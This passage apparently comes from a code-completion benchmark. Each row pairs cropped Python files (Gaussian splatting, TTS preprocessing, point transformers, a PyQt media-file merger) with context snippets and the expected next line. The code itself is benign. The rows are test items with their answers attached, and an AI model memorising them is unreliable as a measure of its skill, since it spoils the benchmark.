preds_rounded = preds.argmax(1)
| res[sset] = binary_metrics(Y, preds_rounded, label_set=label_set, return_arrays=True) | 0 | 2023-12-15 04:10:31+00:00 | 2k |
RomGai/BrainVis | dc_ldm/modules/encoders/modules.py | [
{
"identifier": "Encoder",
"path": "dc_ldm/modules/x_transformer.py",
"snippet": "class Encoder(AttentionLayers):\n def __init__(self, **kwargs):\n assert 'causal' not in kwargs, 'cannot set causality on encoder'\n super().__init__(causal=False, **kwargs)"
},
{
"identifier": "TransformerWrapper",
"path": "dc_ldm/modules/x_transformer.py",
"snippet": "class TransformerWrapper(nn.Module):\n def __init__(\n self,\n *,\n num_tokens,\n max_seq_len,\n attn_layers,\n emb_dim=None,\n max_mem_len=0.,\n emb_dropout=0.,\n num_memory_tokens=None,\n tie_embedding=False,\n use_pos_emb=True\n ):\n super().__init__()\n assert isinstance(attn_layers, AttentionLayers), 'attention layers must be one of Encoder or Decoder'\n\n dim = attn_layers.dim\n emb_dim = default(emb_dim, dim)\n\n self.max_seq_len = max_seq_len\n self.max_mem_len = max_mem_len\n self.num_tokens = num_tokens\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.pos_emb = AbsolutePositionalEmbedding(emb_dim, max_seq_len) if (\n use_pos_emb and not attn_layers.has_pos_emb) else always(0)\n self.emb_dropout = nn.Dropout(emb_dropout)\n\n self.project_emb = nn.Linear(emb_dim, dim) if emb_dim != dim else nn.Identity()\n self.attn_layers = attn_layers\n self.norm = nn.LayerNorm(dim)\n\n self.init_()\n\n self.to_logits = nn.Linear(dim, num_tokens) if not tie_embedding else lambda t: t @ self.token_emb.weight.t()\n\n # memory tokens (like [cls]) from Memory Transformers paper\n num_memory_tokens = default(num_memory_tokens, 0)\n self.num_memory_tokens = num_memory_tokens\n if num_memory_tokens > 0:\n self.memory_tokens = nn.Parameter(torch.randn(num_memory_tokens, dim))\n\n # let funnel encoder know number of memory tokens, if specified\n if hasattr(attn_layers, 'num_memory_tokens'):\n attn_layers.num_memory_tokens = num_memory_tokens\n\n def init_(self):\n nn.init.normal_(self.token_emb.weight, std=0.02)\n\n def forward(\n self,\n x,\n return_embeddings=False,\n mask=None,\n return_mems=False,\n return_attn=False,\n mems=None,\n **kwargs\n ):\n # b, n, device, num_mem = *x.shape, x.device, self.num_memory_tokens\n b = x.shape[0]\n device = x.device\n num_mem = self.num_memory_tokens\n \n x = self.token_emb(x)\n x += self.pos_emb(x)\n x = self.emb_dropout(x)\n\n x = self.project_emb(x)\n\n if num_mem > 0:\n mem = repeat(self.memory_tokens, 'n d -> b n d', b=b)\n x = torch.cat((mem, x), dim=1)\n\n # auto-handle masking after appending memory tokens\n if exists(mask):\n mask = F.pad(mask, (num_mem, 0), value=True)\n\n x, intermediates = self.attn_layers(x, mask=mask, mems=mems, return_hiddens=True, **kwargs)\n x = self.norm(x)\n\n mem, x = x[:, :num_mem], x[:, num_mem:]\n\n out = self.to_logits(x) if not return_embeddings else x\n\n if return_mems:\n hiddens = intermediates.hiddens\n new_mems = list(map(lambda pair: torch.cat(pair, dim=-2), zip(mems, hiddens))) if exists(mems) else hiddens\n new_mems = list(map(lambda t: t[..., -self.max_mem_len:, :].detach(), new_mems))\n return out, new_mems\n\n if return_attn:\n attn_maps = list(map(lambda t: t.post_softmax_attn, intermediates.attn_intermediates))\n return out, attn_maps\n\n return out"
}
] | import torch
import torch.nn as nn
import sys
import kornia
from functools import partial
from PIL import Image
from einops import rearrange, repeat
from transformers import CLIPTokenizer, CLIPTextModel, AutoProcessor, CLIPVisionModel, CLIPVisionModelWithProjection
from dc_ldm.modules.x_transformer import Encoder, TransformerWrapper # TODO: can we directly rely on lucidrains code and simply add this as a reuirement? --> test
from transformers import BertTokenizerFast # TODO: add to reuquirements | 1,310 | # import clip
sys.path.append('../dreamdiffusion/code/')
class AbstractEncoder(nn.Module):
def __init__(self):
super().__init__()
def encode(self, *args, **kwargs):
raise NotImplementedError
class ClassEmbedder(nn.Module):
def __init__(self, embed_dim, n_classes=1000, key='class'):
super().__init__()
self.key = key
self.embedding = nn.Embedding(n_classes, embed_dim)
def forward(self, batch, key=None):
if key is None:
key = self.key
# this is for use in crossattn
c = batch[key][:, None]
c = self.embedding(c)
return c
class TransformerEmbedder(AbstractEncoder):
"""Some transformer encoder layers"""
def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"):
super().__init__()
self.device = device
| # import clip
sys.path.append('../dreamdiffusion/code/')
class AbstractEncoder(nn.Module):
def __init__(self):
super().__init__()
def encode(self, *args, **kwargs):
raise NotImplementedError
class ClassEmbedder(nn.Module):
def __init__(self, embed_dim, n_classes=1000, key='class'):
super().__init__()
self.key = key
self.embedding = nn.Embedding(n_classes, embed_dim)
def forward(self, batch, key=None):
if key is None:
key = self.key
# this is for use in crossattn
c = batch[key][:, None]
c = self.embedding(c)
return c
class TransformerEmbedder(AbstractEncoder):
"""Some transformer encoder layers"""
def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"):
super().__init__()
self.device = device | self.transformer = TransformerWrapper(num_tokens=vocab_size, max_seq_len=max_seq_len, | 1 | 2023-12-16 12:52:14+00:00 | 2k |
Rajeshwaran2001/DRM-Media-Tool | file_merger_dialog.py | [
{
"identifier": "show_error_message",
"path": "helper/message.py",
"snippet": "def show_error_message(parent, message):\n error_box = QMessageBox()\n error_box.setIcon(QMessageBox.Critical)\n error_box.setWindowTitle(\"Error\")\n error_box.setText(message)\n error_box.setWindowIcon(parent.windowIcon())\n error_box.exec_()"
},
{
"identifier": "show_success_message",
"path": "helper/message.py",
"snippet": "def show_success_message(parent, message):\n success_box = QMessageBox()\n success_box.setIcon(QMessageBox.Information)\n success_box.setWindowTitle(\"Success\")\n success_box.setText(message)\n success_box.setWindowIcon(parent.windowIcon())\n success_box.exec_()"
}
] | from PyQt5.QtWidgets import QWidget, QDialog, QVBoxLayout, QLabel, QTableWidget, QPushButton, QHBoxLayout, QTableWidgetItem, QCheckBox
from helper.message import show_error_message, show_success_message
import os
import json
import subprocess | 1,213 |
class FileMergerDialog(QDialog):
def __init__(self, debug_logger, info_logger, folder_path, parent=None):
super().__init__(parent)
self.folder_path = folder_path
self.setWindowTitle("Files Merger")
self.setGeometry(100, 100, 600, 300)
self.layout = QVBoxLayout()
self.file_table_label = QLabel("Files in Directory:")
self.file_table_widget = QTableWidget()
self.file_table_widget.setColumnCount(
3) # Added a column for checkboxes
self.file_table_widget.setHorizontalHeaderLabels(
["File Name", "Select", "Type"])
self.merge_button = QPushButton("Merge")
self.merge_button.clicked.connect(self.merge_files)
self.layout.addWidget(self.file_table_label)
self.layout.addWidget(self.file_table_widget)
self.layout.addWidget(self.merge_button)
self.setLayout(self.layout)
self.populate_file_table()
self.file_table_widget.setColumnWidth(0, 400)
self.debug_logger = debug_logger
self.info_logger = info_logger
def populate_file_table(self):
# Clear existing items in the table widget
self.file_table_widget.setRowCount(0)
try:
# List only video and audio files in the specified directory
video_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))]
audio_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))]
# Add video files to the table widget
for idx, file in enumerate(video_files):
self.add_file_to_table(idx, file, "Video")
# Add audio files to the table widget
for idx, file in enumerate(audio_files, start=len(video_files)):
self.add_file_to_table(idx, file, "Audio")
except FileNotFoundError:
# Handle the case where the specified directory does not exist
self.file_table_widget.setRowCount(1)
self.file_table_widget.setItem(
0, 2, QTableWidgetItem("Directory not found"))
def add_file_to_table(self, idx, file, file_type):
self.file_table_widget.insertRow(idx)
# Center-align the content in the first column
item_file_name = QTableWidgetItem(file)
item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter
self.file_table_widget.setItem(idx, 0, item_file_name)
# Create a widget for the checkbox and center-align it
checkbox_widget = QWidget()
checkbox_layout = QHBoxLayout(checkbox_widget)
checkbox_layout.addStretch(3)
checkbox = QCheckBox()
checkbox.setChecked(False)
checkbox_layout.addWidget(checkbox)
checkbox_layout.addStretch(3)
# Set the widget with the centered checkbox in the second column
self.file_table_widget.setCellWidget(idx, 1, checkbox_widget)
# Set the file type in the third column
self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type))
def merge_files(self):
selected_files = []
metadata = {}
for row in range(self.file_table_widget.rowCount()):
checkbox = self.file_table_widget.cellWidget(
row, 1).layout().itemAt(1).widget()
if checkbox.isChecked():
file_name = self.file_table_widget.item(row, 0).text()
file_type = self.file_table_widget.item(row, 2).text()
selected_files.append((file_name, file_type))
# Check if there are at least one video and one audio file selected
if any(file_type == 'Video' for (_, file_type) in selected_files) and \
any(file_type == 'Audio' for (_, file_type) in selected_files):
# Get all files in the directory ending with .info.json
info_files = [file for file in os.listdir(
self.folder_path) if file.endswith('.info.json')]
img_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))]
language_mapping = {
'en': 'eng',
'eng': 'eng',
'english': 'eng',
'ta': 'tam',
'tamil': 'tam',
'tam': 'tam'
}
# Define language codes
language_codes = list(language_mapping.keys())
suffixes = tuple(f'.{code}.vtt' for code in language_codes)
subtitle_files = [file for file in os.listdir(
self.folder_path) if file.endswith(suffixes)]
thumbnail_file = None # Initialize with a default value
# print(subtitle_files)
if not info_files:
|
class FileMergerDialog(QDialog):
def __init__(self, debug_logger, info_logger, folder_path, parent=None):
super().__init__(parent)
self.folder_path = folder_path
self.setWindowTitle("Files Merger")
self.setGeometry(100, 100, 600, 300)
self.layout = QVBoxLayout()
self.file_table_label = QLabel("Files in Directory:")
self.file_table_widget = QTableWidget()
self.file_table_widget.setColumnCount(
3) # Added a column for checkboxes
self.file_table_widget.setHorizontalHeaderLabels(
["File Name", "Select", "Type"])
self.merge_button = QPushButton("Merge")
self.merge_button.clicked.connect(self.merge_files)
self.layout.addWidget(self.file_table_label)
self.layout.addWidget(self.file_table_widget)
self.layout.addWidget(self.merge_button)
self.setLayout(self.layout)
self.populate_file_table()
self.file_table_widget.setColumnWidth(0, 400)
self.debug_logger = debug_logger
self.info_logger = info_logger
def populate_file_table(self):
# Clear existing items in the table widget
self.file_table_widget.setRowCount(0)
try:
# List only video and audio files in the specified directory
video_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))]
audio_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))]
# Add video files to the table widget
for idx, file in enumerate(video_files):
self.add_file_to_table(idx, file, "Video")
# Add audio files to the table widget
for idx, file in enumerate(audio_files, start=len(video_files)):
self.add_file_to_table(idx, file, "Audio")
except FileNotFoundError:
# Handle the case where the specified directory does not exist
self.file_table_widget.setRowCount(1)
self.file_table_widget.setItem(
0, 2, QTableWidgetItem("Directory not found"))
def add_file_to_table(self, idx, file, file_type):
self.file_table_widget.insertRow(idx)
# Center-align the content in the first column
item_file_name = QTableWidgetItem(file)
item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter
self.file_table_widget.setItem(idx, 0, item_file_name)
# Create a widget for the checkbox and center-align it
checkbox_widget = QWidget()
checkbox_layout = QHBoxLayout(checkbox_widget)
checkbox_layout.addStretch(3)
checkbox = QCheckBox()
checkbox.setChecked(False)
checkbox_layout.addWidget(checkbox)
checkbox_layout.addStretch(3)
# Set the widget with the centered checkbox in the second column
self.file_table_widget.setCellWidget(idx, 1, checkbox_widget)
# Set the file type in the third column
self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type))
def merge_files(self):
selected_files = []
metadata = {}
for row in range(self.file_table_widget.rowCount()):
checkbox = self.file_table_widget.cellWidget(
row, 1).layout().itemAt(1).widget()
if checkbox.isChecked():
file_name = self.file_table_widget.item(row, 0).text()
file_type = self.file_table_widget.item(row, 2).text()
selected_files.append((file_name, file_type))
# Check if there are at least one video and one audio file selected
if any(file_type == 'Video' for (_, file_type) in selected_files) and \
any(file_type == 'Audio' for (_, file_type) in selected_files):
# Get all files in the directory ending with .info.json
info_files = [file for file in os.listdir(
self.folder_path) if file.endswith('.info.json')]
img_files = [file for file in os.listdir(
self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))]
language_mapping = {
'en': 'eng',
'eng': 'eng',
'english': 'eng',
'ta': 'tam',
'tamil': 'tam',
'tam': 'tam'
}
# Define language codes
language_codes = list(language_mapping.keys())
suffixes = tuple(f'.{code}.vtt' for code in language_codes)
subtitle_files = [file for file in os.listdir(
self.folder_path) if file.endswith(suffixes)]
thumbnail_file = None # Initialize with a default value
# print(subtitle_files)
if not info_files: | show_error_message(self, "Error: No Metadata files found.") | 0 | 2023-12-18 11:50:40+00:00 | 2k |
gmum/ViewingDirectionGaussianSplatting | scene/cameras.py | [
{
"identifier": "getWorld2View2",
"path": "utils/graphics_utils.py",
"snippet": "def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0):\n Rt = np.zeros((4, 4))\n Rt[:3, :3] = R.transpose()\n Rt[:3, 3] = t\n Rt[3, 3] = 1.0\n\n C2W = np.linalg.inv(Rt)\n cam_center = C2W[:3, 3]\n cam_center = (cam_center + translate) * scale\n C2W[:3, 3] = cam_center\n Rt = np.linalg.inv(C2W)\n return np.float32(Rt)"
},
{
"identifier": "getProjectionMatrix",
"path": "utils/graphics_utils.py",
"snippet": "def getProjectionMatrix(znear, zfar, fovX, fovY):\n tanHalfFovY = math.tan((fovY / 2))\n tanHalfFovX = math.tan((fovX / 2))\n\n top = tanHalfFovY * znear\n bottom = -top\n right = tanHalfFovX * znear\n left = -right\n\n P = torch.zeros(4, 4)\n\n z_sign = 1.0\n\n P[0, 0] = 2.0 * znear / (right - left)\n P[1, 1] = 2.0 * znear / (top - bottom)\n P[0, 2] = (right + left) / (right - left)\n P[1, 2] = (top + bottom) / (top - bottom)\n P[3, 2] = z_sign\n P[2, 2] = z_sign * zfar / (zfar - znear)\n P[2, 3] = -(zfar * znear) / (zfar - znear)\n return P"
}
] | import torch
import numpy as np
from torch import nn
from utils.graphics_utils import getWorld2View2, getProjectionMatrix | 915 | #
# Copyright (C) 2023, Inria
# GRAPHDECO research group, https://team.inria.fr/graphdeco
# All rights reserved.
#
# This software is free for non-commercial, research and evaluation use
# under the terms of the LICENSE.md file.
#
# For inquiries contact [email protected]
#
class Camera(nn.Module):
def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask,
image_name, uid,
trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda"
):
super(Camera, self).__init__()
self.uid = uid
self.colmap_id = colmap_id
self.R = R
self.T = T
self.FoVx = FoVx
self.FoVy = FoVy
self.image_name = image_name
try:
self.data_device = torch.device(data_device)
except Exception as e:
print(e)
print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" )
self.data_device = torch.device("cuda")
self.original_image = image.clamp(0.0, 1.0).to(self.data_device)
self.image_width = self.original_image.shape[2]
self.image_height = self.original_image.shape[1]
if gt_alpha_mask is not None:
self.original_image *= gt_alpha_mask.to(self.data_device)
else:
self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device)
self.zfar = 100.0
self.znear = 0.01
self.trans = trans
self.scale = scale
self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda()
| #
# Copyright (C) 2023, Inria
# GRAPHDECO research group, https://team.inria.fr/graphdeco
# All rights reserved.
#
# This software is free for non-commercial, research and evaluation use
# under the terms of the LICENSE.md file.
#
# For inquiries contact [email protected]
#
class Camera(nn.Module):
def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask,
image_name, uid,
trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda"
):
super(Camera, self).__init__()
self.uid = uid
self.colmap_id = colmap_id
self.R = R
self.T = T
self.FoVx = FoVx
self.FoVy = FoVy
self.image_name = image_name
try:
self.data_device = torch.device(data_device)
except Exception as e:
print(e)
print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" )
self.data_device = torch.device("cuda")
self.original_image = image.clamp(0.0, 1.0).to(self.data_device)
self.image_width = self.original_image.shape[2]
self.image_height = self.original_image.shape[1]
if gt_alpha_mask is not None:
self.original_image *= gt_alpha_mask.to(self.data_device)
else:
self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device)
self.zfar = 100.0
self.znear = 0.01
self.trans = trans
self.scale = scale
self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda() | self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda() | 1 | 2023-12-21 10:09:17+00:00 | 2k |
tonnetonne814/PL-Bert-VITS2 | preprocess_ja.py | [
{
"identifier": "TextCleaner",
"path": "PL_BERT_ja/text_utils.py",
"snippet": "class TextCleaner:\n def __init__(self, dummy=None):\n self.word_index_dictionary = symbol_to_id\n def __call__(self, text):\n indexes = []\n japanese = False\n for char in text:\n try:\n indexes.append(self.word_index_dictionary[char])\n except:\n if char == \"。\" or char == \"、\":\n indexes.append(0) # padとして扱う\n\n return indexes"
},
{
"identifier": "phonemize",
"path": "PL_BERT_ja/phonemize.py",
"snippet": "def phonemize(text, tokenizer):\n text = unicodedata.normalize(\"NFKC\", text)\n words = tokenizer.tokenize(text)\n input_ids_ = tokenizer.convert_tokens_to_ids(words)\n \n phonemes = []\n input_ids = []\n for i in range(len(words)):\n word = words[i]\n input_id = input_ids_[i]\n phoneme = global_phonemize(word.replace('#', ''))\n if len(phoneme) != 0:\n phonemes.append(''.join(phoneme))\n input_ids.append(input_id)\n \n assert len(input_ids) == len(phonemes)\n return {'input_ids' : input_ids, 'phonemes': phonemes}"
},
{
"identifier": "MultiTaskModel",
"path": "PL_BERT_ja/model.py",
"snippet": "class MultiTaskModel(nn.Module):\n def __init__(self, model, num_tokens, num_vocab, hidden_size):\n super().__init__()\n\n self.encoder = model\n self.mask_predictor = nn.Linear(hidden_size, num_tokens)\n self.word_predictor = nn.Linear(hidden_size, num_vocab)\n \n def forward(self, phonemes, attention_mask=None):\n output = self.encoder(phonemes, attention_mask=attention_mask, output_hidden_states=True)\n tokens_pred = self.mask_predictor(output.last_hidden_state)\n words_pred = self.word_predictor(output.last_hidden_state)\n \n return tokens_pred, words_pred, output"
}
] | import argparse
import os
import polars
import random
import torch
import yaml, torch
from PL_BERT_ja.text_utils import TextCleaner
from PL_BERT_ja.phonemize import phonemize
from tqdm import tqdm
from PL_BERT_ja.model import MultiTaskModel
from transformers import AlbertConfig, AlbertModel
from transformers import BertJapaneseTokenizer | 1,456 |
def preprocess(dataset_dir, pl_bert_dir):
n_val_test_file = 10
filelist_dir = "./filelists/"
dataset_name = "jvnv_ver1"
os.makedirs(filelist_dir, exist_ok=True)
split_symbol = "||||"
transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0]
emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1"))
style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger"))
pl_bert_savedir = "./pl_bert_embeddings"
os.makedirs(pl_bert_savedir, exist_ok=True)
pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir)
pl_bert_cleaner = TextCleaner()
pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer'])
hidden_size = pl_bert_config["model_params"]["hidden_size"]
n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1
filelists = list()
spk_g = ["F", "M"]
for line in tqdm(transcript_csv_df):
index_name, emo_prefix, text = line.split("|")
emotion, style, file_idx = index_name.split("_")
text = text.replace("\n", "")
phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"])
input_ids = pl_bert_cleaner(phonemes)
with torch.inference_mode():
hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"]
save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), device=device)
for idx, hidden_stat in enumerate(hidden_stats):
save_tensor[idx, :, :] = hidden_stat
torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa"))
for g_idx in range(2):
for spk_idx in range(2):
spk_ID = str(g_idx + spk_idx*2)
spk = spk_g[g_idx] + str(spk_idx+1)
wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav")
filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n")
val_list = list()
test_list = list()
for idx in range(n_val_test_file*2):
target_idx = random.randint(0, len(filelists))
target_line = filelists.pop(target_idx)
if idx % 2 == 1:
val_list.append(target_line)
else:
test_list.append(target_line)
write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt"))
write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt"))
write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt"))
return 0
def write_txt(lists, path):
with open(path, mode="w", encoding="utf-8") as f:
f.writelines(lists)
def get_pl_bert_ja(dir):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config_path=os.path.join(dir, "config.yml")
config = yaml.safe_load(open(config_path))
albert_base_configuration = AlbertConfig(**config['model_params'])
bert_ = AlbertModel(albert_base_configuration).to(device)
#num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1
|
def preprocess(dataset_dir, pl_bert_dir):
n_val_test_file = 10
filelist_dir = "./filelists/"
dataset_name = "jvnv_ver1"
os.makedirs(filelist_dir, exist_ok=True)
split_symbol = "||||"
transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0]
emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1"))
style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger"))
pl_bert_savedir = "./pl_bert_embeddings"
os.makedirs(pl_bert_savedir, exist_ok=True)
pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir)
pl_bert_cleaner = TextCleaner()
pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer'])
hidden_size = pl_bert_config["model_params"]["hidden_size"]
n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1
filelists = list()
spk_g = ["F", "M"]
for line in tqdm(transcript_csv_df):
index_name, emo_prefix, text = line.split("|")
emotion, style, file_idx = index_name.split("_")
text = text.replace("\n", "")
phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"])
input_ids = pl_bert_cleaner(phonemes)
with torch.inference_mode():
hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"]
save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), device=device)
for idx, hidden_stat in enumerate(hidden_stats):
save_tensor[idx, :, :] = hidden_stat
torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa"))
for g_idx in range(2):
for spk_idx in range(2):
spk_ID = str(g_idx + spk_idx*2)
spk = spk_g[g_idx] + str(spk_idx+1)
wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav")
filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n")
val_list = list()
test_list = list()
for idx in range(n_val_test_file*2):
target_idx = random.randint(0, len(filelists))
target_line = filelists.pop(target_idx)
if idx % 2 == 1:
val_list.append(target_line)
else:
test_list.append(target_line)
write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt"))
write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt"))
write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt"))
return 0
def write_txt(lists, path):
with open(path, mode="w", encoding="utf-8") as f:
f.writelines(lists)
def get_pl_bert_ja(dir):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config_path=os.path.join(dir, "config.yml")
config = yaml.safe_load(open(config_path))
albert_base_configuration = AlbertConfig(**config['model_params'])
bert_ = AlbertModel(albert_base_configuration).to(device)
#num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1 | bert = MultiTaskModel( | 2 | 2023-12-16 05:34:02+00:00 | 2k |
Ruiyuan-Zhang/CCS | multi_part_assembly/models/modules/encoder/point_transformer/transformer.py | [
{
"identifier": "index_points",
"path": "multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py",
"snippet": "def index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S, [K]]\n Return:\n new_points:, indexed points data, [B, S, [K], C]\n \"\"\"\n raw_size = idx.size()\n idx = idx.reshape(raw_size[0], -1)\n res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1)))\n return res.reshape(*raw_size, -1)"
},
{
"identifier": "square_distance",
"path": "multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py",
"snippet": "def square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1)"
}
] | from multi_part_assembly.models.modules.encoder.point_transformer.pointnet_util import index_points, square_distance
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np | 664 |
class TransformerBlock(nn.Module):
def __init__(self, d_points, d_model, k) -> None:
super().__init__()
self.fc1 = nn.Linear(d_points, d_model)
self.fc2 = nn.Linear(d_model, d_points)
self.fc_delta = nn.Sequential(
nn.Linear(3, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.fc_gamma = nn.Sequential(
nn.Linear(d_model, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.w_qs = nn.Linear(d_model, d_model, bias=False)
self.w_ks = nn.Linear(d_model, d_model, bias=False)
self.w_vs = nn.Linear(d_model, d_model, bias=False)
self.k = k
# xyz: b x n x 3, features: b x n x f
def forward(self, xyz, features):
|
class TransformerBlock(nn.Module):
def __init__(self, d_points, d_model, k) -> None:
super().__init__()
self.fc1 = nn.Linear(d_points, d_model)
self.fc2 = nn.Linear(d_model, d_points)
self.fc_delta = nn.Sequential(
nn.Linear(3, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.fc_gamma = nn.Sequential(
nn.Linear(d_model, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.w_qs = nn.Linear(d_model, d_model, bias=False)
self.w_ks = nn.Linear(d_model, d_model, bias=False)
self.w_vs = nn.Linear(d_model, d_model, bias=False)
self.k = k
# xyz: b x n x 3, features: b x n x f
def forward(self, xyz, features): | dists = square_distance(xyz, xyz) | 1 | 2023-12-15 13:13:01+00:00 | 2k |
uc-vision/taichi-splatting | taichi_splatting/scripts/fit_image_gaussians.py | [
{
"identifier": "RasterConfig",
"path": "taichi_splatting/data_types.py",
"snippet": "class RasterConfig:\n tile_size: int = 16\n\n # pixel tilin per thread in the backwards pass \n pixel_stride: Tuple[int, int] = (2, 2)\n\n margin_tiles: int = 3\n\n # cutoff N standard deviations from mean\n gaussian_scale: float = 3.0 \n \n # cull to an oriented box, otherwise an axis aligned bounding box\n tight_culling: bool = True \n\n clamp_max_alpha: float = 0.99\n alpha_threshold: float = 1. / 255.\n saturate_threshold: float = 0.9999"
},
{
"identifier": "render_gaussians",
"path": "taichi_splatting/renderer2d.py",
"snippet": "def project_gaussians2d(points: Gaussians2D) -> torch.Tensor:\ndef render_gaussians(\n gaussians: Gaussians2D,\n image_size: Tuple[Integral, Integral],\n raster_config: RasterConfig\n ):"
},
{
"identifier": "random_2d_gaussians",
"path": "taichi_splatting/tests/random_data.py",
"snippet": "def random_2d_gaussians(n, image_size, scale_factor=1.0, alpha_range=(0.1, 0.9), depth_range=(0.1, 100.0)):\n w, h = image_size\n\n position = torch.rand(n, 2) * torch.tensor([w, h], dtype=torch.float32).unsqueeze(0)\n depth = torch.rand((n, 1)) * (depth_range[1] - depth_range[0]) + depth_range[0]\n \n density_scale = scale_factor * w / (1 + math.sqrt(n))\n scaling = (torch.rand(n, 2) + 0.2) * density_scale \n\n rotation = torch.randn(n, 2) \n rotation = rotation / torch.norm(rotation, dim=1, keepdim=True)\n\n low, high = alpha_range\n alpha = torch.rand(n) * (high - low) + low\n\n return Gaussians2D(\n position=position,\n depth=depth,\n log_scaling=torch.log(scaling),\n rotation=rotation,\n alpha_logit=torch_proj.inverse_sigmoid(alpha),\n feature=torch.rand(n, 3),\n batch_size=(n,)\n )"
},
{
"identifier": "check_finite",
"path": "taichi_splatting/torch_ops/util.py",
